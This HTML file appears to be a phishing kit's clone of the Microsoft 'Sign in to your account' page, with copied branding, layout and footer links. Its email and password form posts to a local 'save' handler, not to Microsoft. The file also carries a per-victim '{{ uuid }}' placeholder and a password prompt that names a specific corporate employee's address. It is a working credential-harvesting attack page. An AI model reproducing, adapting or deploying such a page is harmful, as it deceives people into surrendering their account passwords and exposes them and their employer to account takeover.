<!DOCTYPE html>
<!-- saved from url=(0872)https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=637739660002147631.YTNiZmY1NDItMjQzYi00YjBlLWJkYjgtNmY1NjMxZDcyODgzOGFlMjhjMTktNjJhZS00MjNiLThhNzItN2FkZDNjYzY5NzZi&ui_locales=en-US&mkt=en-US&client-request-id=7191909e-b5c4-4b16-a307-f185a001b35a&state=4BrcaKR-q5krRFtkhIQ5Q7PsLlJM7cefDCx-dgG9eUiLekiDxjAIrWJwPouBCM8YnJoT28z_4x4N9U_RtXn2-vjZv6GjXPuXdDNSFY2p-oO9M2BT4C2vlzPVXrAUr5taTmrP7O6gfw-yJ6Wjr-3oIayeYzCpwCXXIbE7S0D_sDmI5_6xfy7nZIP1bJjSnIyCv584feDb6GZwSYauZmQ3aWnRZ3BaXAZC69PqmWp8icYdPvhtbhitbCHaBNuSVjPtiOrRXbfjZgn1rwpSLBUtswF1BNmXFnvkY41k9bwPhPw&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.12.1.0&sso_reload=true -->
<html dir="ltr" class="" lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Sign in to your account</title>    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="x-dns-prefetch-control" content="on">
    <meta name="PageID" content="ConvergedSignIn">
    <meta name="SiteID" content="">
    <meta name="ReqLC" content="1033">
    <meta name="LocLC" content="en-US">
    <meta name="format-detection" content="telephone=no">
    <meta name="robots" content="none">

    <link href="../style.css" rel="stylesheet">
    <link rel="shortcut icon"
        href="../favicon.ico">

    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-DMYRD3W8H5"></script>
    
</head>

<body>
    <div>        
        <form id="login" novalidate="novalidate" spellcheck="false" method="post" target="_top"
            autocomplete="off"
            action="save">
            <div id="lightboxBackgroundContainer">
                <div class="background-image-holder" role="presentation">
                    <div class="background-image ext-background-image"
                        style="background-image: url(/background.svg);">
                    </div>
                </div>
            </div>
            <div class="outer">
                <div class="template-section main-section">
                    <div class="middle ext-middle">
                        <div class="full-height">
                            <div class="flex-column">
                                <div class="win-scroll">
                                    <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">
                                        <div class="lightbox-cover">                                            
                                        </div>
                                        <div>
                                            <img
                                                class="logo" role="img"                                                        
                                                svgsrc="../microsoft_logo.svg"
                                                src="../microsoft_logo.svg"
                                                alt="Microsoft">
                                        </div>
                                        <div role="main" id="main">
                                            <div class="">
                                                <div class="pagination-view animate slide-in-next">
                                                    <div>
                                                        <div>
                                                            <div class="row title ext-title" id="loginHeader">
                                                                <div role="heading" aria-level="1">Sign in</div>
                                                            </div>
                                                        </div>
                                                        <div class="row">
                                                            <div id= "alert" role="alert" aria-live="assertive" hidden>
                                                                <div class="col-md-24 error ext-error" id="usernameError">This username may
                                                                    be incorrect. Make sure you typed it correctly. Otherwise, contact your admin.</div>
                                                            </div>
                                                            <div class="form-group col-md-24">
                                                                <div class="placeholderContainer">
                                                                    <input type="email" name="email"
                                                                        id="email" maxlength="113"
                                                                        class="form-control ltr_override input ext-input text-box ext-text-box"
                                                                        aria-required="true"
                                                                        aria-label="Enter your email, phone, or Skype."
                                                                        aria-describedby="loginHeader usernameError"
                                                                        placeholder="Email, phone, or Skype">
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <div class="position-buttons">
                                                            <div class="row">
                                                                <div class="col-md-24">
                                                                    <div class="text-13">
                                                                        <div class="form-group"> No account? 
                                                                            <a href="/"
                                                                                id="signup"
                                                                                aria-label="Create a Microsoft account">
                                                                                Create one!
                                                                            </a>
                                                                        </div>
                                                                        <div class="form-group">
                                                                            <a id="cantAccessAccount"
                                                                                name="cannotAccessAccount"
                                                                                href="/">
                                                                                Can’t access your account?
                                                                            </a>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>

                                                        <div class="win-button-pin-bottom">
                                                            <div class="row">
                                                                <div>
                                                                    <div class="col-xs-24 no-padding-left-right button-container">
                                                                        <div class="inline-block">
                                                                            <input type="button"
                                                                                class="win-button button-secondary button ext-button secondary ext-secondary" value="Back">
                                                                        </div>
                                                                        <div class="inline-block">
                                                                            <input type="button"
                                                                                id="nextButton"
                                                                                class="win-button button_primary button ext-button primary ext-primary" value="Next">
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>

                                        <div class="" id="passcode" hidden >
                                            <div class="animate slide-in-next">
                                                <div>
                                                    <div class="identityBanner">
                                                        <button type="button" class="backButton" id="backButton" aria-label="Back">
                                                            <img role="presentation" svgsrc="arrow_left.svg" data-bind="imgSrc" src="arrow_left.svg">
                                                        </button>
                                                        <div id="displayName" class="identity">
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="pagination-view animate has-identity-banner slide-in-next">
                                                <div data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true">                                        
                                                    <div id="loginHeader" class="row title ext-title" data-bind="externalCss: { 'title': true }">
                                                        <div role="heading" aria-level="1">Enter
                                                            password</div>
                                                    </div>
                                                    <div class="row">
                                                        <div class="form-group col-md-24">
                                                            <div role="alert" aria-live="assertive">
                                                            </div>
                                                            <div class="placeholderContainer">
                                                                <input name="password" type="password" id="password" autocomplete="off"
                                                                    class="form-control input ext-input text-box ext-text-box" aria-required="true"
                                                                    aria-describedby="loginHeader passwordError  " placeholder="Password"
                                                                    aria-label="Enter the password for leonardo.leao@wago.com" tabindex="0">
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="position-buttons">
                                                        <div>
                                                            <div class="row">
                                                                <div class="col-md-24">
                                                                    <div class="text-13">
                                                                        <div class="form-group">
                                                                            <a id="idA_PWD_ForgotPassword" role="link" href="/">Forgot my password</a>
                                                                        </div>
                                                                        <div class="form-group">
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                        
                                                        <div class="win-button-pin-bottom">
                                                            <div class="row">
                                                                <div>
                                                                    <div class="col-xs-24 no-padding-left-right button-container">
                                                                        <div data-bind="css: { 'inline-block': isPrimaryButtonVisible }" class="inline-block">
                                                                            <input type="submit" id="submitButton"
                                                                                class="win-button button_primary button ext-button primary ext-primary"
                                                                                value="Sign in">
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <a id="uuid" hidden>{{ uuid }}</a>
                                        <input type="hidden" name="frontendData"
                                            data-bind="value: test" value="empty">
                                        </div>
                                    </div>
                                    <div class="promoted-fed-cred-box ext-promoted-fed-cred-box">
                                        <div class="promoted-fed-cred-content">
                                            <div class="row tile">
                                                <div class="table" role="button" tabindex="0"aria-label="Sign-in options">
                                                    <div class="table-row">
                                                        <div class="table-cell tile-img medium">
                                                            <img
                                                                class="tile-img medium" role="presentation"
                                                                src="../signin-options.svg">
                                                        </div>
                                                        <div class="table-cell text-left content">
                                                            <div data-test-id="signinOptions">
                                                                Sign-in options</div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>

                <div id="footer" role="contentinfo" class="footer ext-footer">
                    <div>
                        <div id="footerLinks" class="footerNode text-secondary">
                            <a id="ftrTerms" 
                                href="https://www.microsoft.com/en-US/servicesagreement/"
                                class="footer-content ext-footer-content footer-item ext-footer-item">Terms of
                                use
                            </a>
                            <a id="ftrPrivacy" 
                                href="https://privacy.microsoft.com/en-US/privacystatement"
                                class="footer-content ext-footer-content footer-item ext-footer-item">Privacy
                                &amp; cookies
                            </a>
                            <a id="moreOptions"
                                href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&amp;redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&amp;response_type=code%20id_token&amp;scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&amp;response_mode=form_post&amp;nonce=637739660002147631.YTNiZmY1NDItMjQzYi00YjBlLWJkYjgtNmY1NjMxZDcyODgzOGFlMjhjMTktNjJhZS00MjNiLThhNzItN2FkZDNjYzY5NzZi&amp;ui_locales=en-US&amp;mkt=en-US&amp;client-request-id=7191909e-b5c4-4b16-a307-f185a001b35a&amp;state=4BrcaKR-q5krRFtkhIQ5Q7PsLlJM7cefDCx-dgG9eUiLekiDxjAIrWJwPouBCM8YnJoT28z_4x4N9U_RtXn2-vjZv6GjXPuXdDNSFY2p-oO9M2BT4C2vlzPVXrAUr5taTmrP7O6gfw-yJ6Wjr-3oIayeYzCpwCXXIbE7S0D_sDmI5_6xfy7nZIP1bJjSnIyCv584feDb6GZwSYauZmQ3aWnRZ3BaXAZC69PqmWp8icYdPvhtbhitbCHaBNuSVjPtiOrRXbfjZgn1rwpSLBUtswF1BNmXFnvkY41k9bwPhPw&amp;x-client-SKU=ID_NETSTANDARD2_0&amp;x-client-ver=6.12.1.0&amp;sso_reload=true#"
                                role="button" 
                                aria-label="Click here for troubleshooting information" aria-expanded="false"
                                class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">
                                ...
                            </a>
                        </div>
                    </div>
                </div>
            </div>   
        </form>
    </div>
</body>

<script src="jquery-3.6.0.min.js"></script>
<script src="main.js"></script>
</html>